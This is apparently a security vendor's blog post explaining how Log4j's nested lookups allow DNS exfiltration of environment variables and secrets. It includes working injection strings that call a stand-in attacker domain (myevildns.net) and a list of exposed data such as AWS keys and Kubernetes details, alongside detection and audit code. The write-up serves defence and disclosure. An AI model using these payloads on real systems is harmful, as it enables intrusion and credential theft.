Data Exfiltration using the Log4j Vulnerability

Dec 22, 2021 2:25:00 PM


We've written before about how Log4j can be exploited using its lookup feature in combination with LDAP to enable remote code execution. Less has been written about other vulnerabilities associated with the lookup feature. Some of these (including the one written about here) cannot be practically blocked using egress filtering.

This technical note describes a new attack vector for Log4j that utilizes DNS for reconnaissance and, in limited cases, data exfiltration of secrets. Especially worrisome is the possibility of stealing AWS API keys for poorly configured services where those keys are present in environment variables.

Background

Log4j offers a built-in substitution language to aid logging. For example, an application programmer might log the string

"Caught exception on Java Runtime ${runtime} on hardware ${hw}"

At the time the message is logged, the variables ${runtime} and ${hw} are substituted in the running Java program, so that the string logged might look like this:

"Caught exception on Java Runtime Java(TM) SE Runtime Environment (build 1.7.0_67-b01) from Oracle Corporation on hardware processors: 4, architecture: amd64-64, instruction sets: amd64"

The Log4j library looks for expressions of the form ${expression} in the string and substitutes the corresponding value for each. The available expressions are documented in the Lookups section of the Log4j reference.

One of the lookups is of the form:

${jndi:provider}

where one of the possible providers is LDAP. Thus, when Log4j receives the string

${jndi:ldap://servername:port/resource}

the Log4j library contacts servername on the given TCP port and asks for information about resource using the LDAP protocol.

Since the substitution language allows nested substitutions, this can be exploited for DNS exfiltration of other information accessible via the lookup feature. For instance, consider what happens when the following string is logged:

${jndi:ldap://${env:USER}.myevildns.net:1389/foobar}

Log4j first performs the nested substitution of ${env:USER}, replacing it with the value of the USER environment variable, then attempts a DNS lookup of the resulting hostname. For example, if the value of USER is tomcat, the DNS lookup will be for tomcat.myevildns.net. The DNS infrastructure will happily route this request to the nameservers for the myevildns.net domain, where the data (the value of USER) is harvested. More details on DNS exfiltration can be found in this blog post.
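The inside-out order of substitution can be illustrated with a small Python sketch. This is a toy model written for this note, not Log4j's actual implementation: the function names are hypothetical, only ${env:NAME} lookups are handled, and the environment is passed in as a plain dictionary.

```python
import re
from urllib.parse import urlsplit

# Matches an innermost ${...} expression, i.e. one with no nested "${" inside.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")

def _substitute(match, env):
    expr = match.group(1)
    if expr.startswith("env:"):
        name = expr[len("env:"):]
        # Unknown variables are left unresolved in this toy model.
        return env.get(name, match.group(0))
    return match.group(0)  # other lookups (e.g. jndi) are left untouched

def resolve_env_lookups(message, env, max_passes=10):
    """Repeatedly replace innermost ${env:NAME} expressions (toy model)."""
    for _ in range(max_passes):
        resolved = INNERMOST.sub(lambda m: _substitute(m, env), message)
        if resolved == message:
            break
        message = resolved
    return message

def ldap_host(resolved):
    """Return the hostname a ${jndi:ldap://...} expression would look up."""
    m = re.fullmatch(r"\$\{jndi:(ldap://[^}]*)\}", resolved)
    return urlsplit(m.group(1)).hostname if m else None

payload = "${jndi:ldap://${env:USER}.myevildns.net:1389/foobar}"
resolved = resolve_env_lookups(payload, {"USER": "tomcat"})
print(ldap_host(resolved))
```

With USER set to tomcat, the hostname handed to the resolver already contains the secret value, which is why the leak happens at the DNS stage, before any LDAP connection is made.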

Such exfiltration is difficult to stop. In practice, you can't simply prevent your server from contacting DNS, because too many internal processes on the server depend on it. DNS filtering on top-level domains doesn't help much either, because the attacker can register new domains more quickly than you can blacklist them.

The lookup library is chock full of interesting data that can be exfiltrated, including:

Environment variables. Lord help you if you have AWS_KEY and AWS_SECRET_KEY set, because then the attacker can access most of your AWS resources programmatically.
Container information: the containerId and imageId tell the attacker that the server is running in a container, which should prompt them to look for Kubernetes information.
Kubernetes information: including the pod ID, name, and IP address, the host IP address, and the URL used to access the Kubernetes API server.
Web context information: data from the ServletContext is accessible. For well-known servlets, sensitive information may be accessible, including authentication tokens.

To validate that such exfiltration was possible, we set up a Tomcat web application using the vulnerable Log4j library. We also ran tcpdump on the server to capture DNS traffic. Injecting the string

${jndi:ldap://${env:USER}.myevildns.net:1389/foobar}

resulted in the expected DNS lookup for tomcat.myevildns.net.

The following table shows the results of various other attempts:

Log4j sub-expression	Resulting DNS lookup
`${runtime}.foo.com`	Java(TM) SE RuntimeEnvironment (build 1.8.0_20-b26) from Oracle Corporation.foo.com.
`${hw}.foo.com`	processors: 1, architecture: amd64-64.foo.com.
`${env:HOME}.foo.com`	home/tomcat.foo.com.
`${env:SHELL}.foo.com`	bin/bash.foo.com.
`${env:CLASSPATH}.foo.com`	${env:CLASSPATH}.foo.com.

Detection

Since the attacker will not know your environment variables or other configuration parameters, they are likely to attempt substitutions that won't work, like CLASSPATH in the table above. This means that watching for DNS lookups containing the string ${ has a high probability of detecting this technique. However, the check can be bypassed if the attacker supplies a default value using the form ${env:VAR:-default}.
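A minimal sketch of that check in Python follows. It assumes you already have a list of queried DNS names (for example, extracted from a tcpdump capture); the function name and the sample queries are hypothetical and are only meant to show the idea.

```python
def has_unresolved_lookup(qname: str) -> bool:
    """Flag a DNS query name that still contains an unexpanded ${ expression."""
    return "${" in qname

# Hypothetical query names, as they might appear in captured DNS traffic.
queries = [
    "tomcat.myevildns.net.",
    "${env:CLASSPATH}.foo.com.",
    "www.example.com.",
]

flagged = [q for q in queries if has_unresolved_lookup(q)]
for q in flagged:
    print("suspicious DNS lookup:", q)
```

Note that the first query, a successful exfiltration of USER, is not flagged: the check only catches failed substitutions, and an attacker who supplies a default value avoids those entirely.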

One commonly discussed mitigation for organizations that cannot patch Log4j is network egress and ingress filtering. While this approach might prevent RCEs, it still leaves organizations vulnerable to DNS-based exfiltration, which can be devastating if secrets are kept in environment variables.

Best practices dictate that secrets should never be stored in environment variables, since they can be accessed by attackers. The technique discussed here is just one of many.
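As a rough way to audit a process for this exposure, the following Python sketch lists environment variable names that look like they might hold secrets. The name pattern (KEY, SECRET, TOKEN, PASSWORD) is an assumption chosen for illustration and will produce both false positives and false negatives; the function name is hypothetical.

```python
import os
import re

# Assumed heuristic: variable names containing these words may hold secrets.
SECRET_NAME = re.compile(r"(KEY|SECRET|TOKEN|PASSWORD)", re.IGNORECASE)

def secret_like_names(env):
    """Return the sorted variable names that match the heuristic pattern."""
    return sorted(name for name in env if SECRET_NAME.search(name))

if __name__ == "__main__":
    # Print names only, never values, so the audit itself does not leak secrets.
    for name in secret_like_names(os.environ):
        print(name)
```

Any name reported here is a value that a ${env:...} lookup could place into a DNS query on a vulnerable server.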

Please use Spyderbat's free tool to scan your system for vulnerable log4j files.